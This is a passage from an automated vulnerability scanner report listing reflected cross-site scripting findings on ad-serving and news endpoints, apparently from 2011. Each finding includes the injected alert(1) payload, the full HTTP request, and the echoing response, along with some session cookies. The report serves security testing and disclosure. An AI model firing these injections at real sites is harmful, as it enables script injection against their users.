User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2371CCF36BB4CD1C3903BAFA7DB1B8; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs
...[SNIP]...

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81450"-alert(1)-"a8455fefa1a was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CEF8081690D6E9E07703051E14EAEF7F; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   
...[SNIP]...

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the cn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 957da"-alert(1)-"78ec1831ab6 was submitted in the cn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F1F0E0C0EAEF9DD5E89E5026D7B2B06C; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$
...[SNIP]...

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbdb4"-alert(1)-"d71fc6467dd was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6C95250B28D8036DD98940A9996ED89B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   
...[SNIP]...

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d076c"-alert(1)-"1445d99a69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44720CDF40B1E1003F60667678267C13; Path=/
Content-Type: text/javascript
Content-Length: 8046
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7d6c"-alert(1)-"80b9417c1c7 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CD7729D9C7FC8F4643AA4077B8F2FE0A; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4390c"-alert(1)-"b19235bef5c was submitted in the ord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=091B0556134C33307EDDBD3CA4F49AA5; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f5b8"-alert(1)-"63705da3f9a was submitted in the pli parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EE59EBF0BC8D542B7477BE784AA60A6E; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep :
...[SNIP]...

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44ad2"-alert(1)-"8cca0a3c179 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4ED83BE5AD07FABADC71565EC8709ACE; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl :
...[SNIP]...

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f74'%3balert(1)//9b90896c602 was submitted in the longUrl parameter. This input was echoed as e7f74';alert(1)//9b90896c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /asp/usatly/handler.ashx?longUrl=e7f74'%3balert(1)//9b90896c602 HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close
Content-Length: 140

var usatlyshorturl = 'e7f74';alert(1)//9b90896c602'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com

2.92. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd65'-alert(1)-'9350f9133f9 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AQAAAAAADEAAAAAAAAAMQAAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAehMn5gAAAAA.&tt_code=vert-107&udj=uf%28%27a%27%2C+9797%2C+1304955326%29%3Buf%28%27c%27%2C+45814%2C+1304955326%29%3Buf%28%27r%27%2C+173255%2C+1304955326%29%3Bppv%288991%2C+%277215316608111068896%27%2C+1304955326%2C+1304998526%2C+45814%2C+25553%29%3B&cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9&referrer=http://www.csmonitor.com/Business&pp=TcgJqwAJrDQK5ToFmVxG_jr_KjIn-i4M6rRykw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:35:46 GMT
Content-Length: 1385

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAA
...[SNIP]...
CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9/referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEE
...[SNIP]...

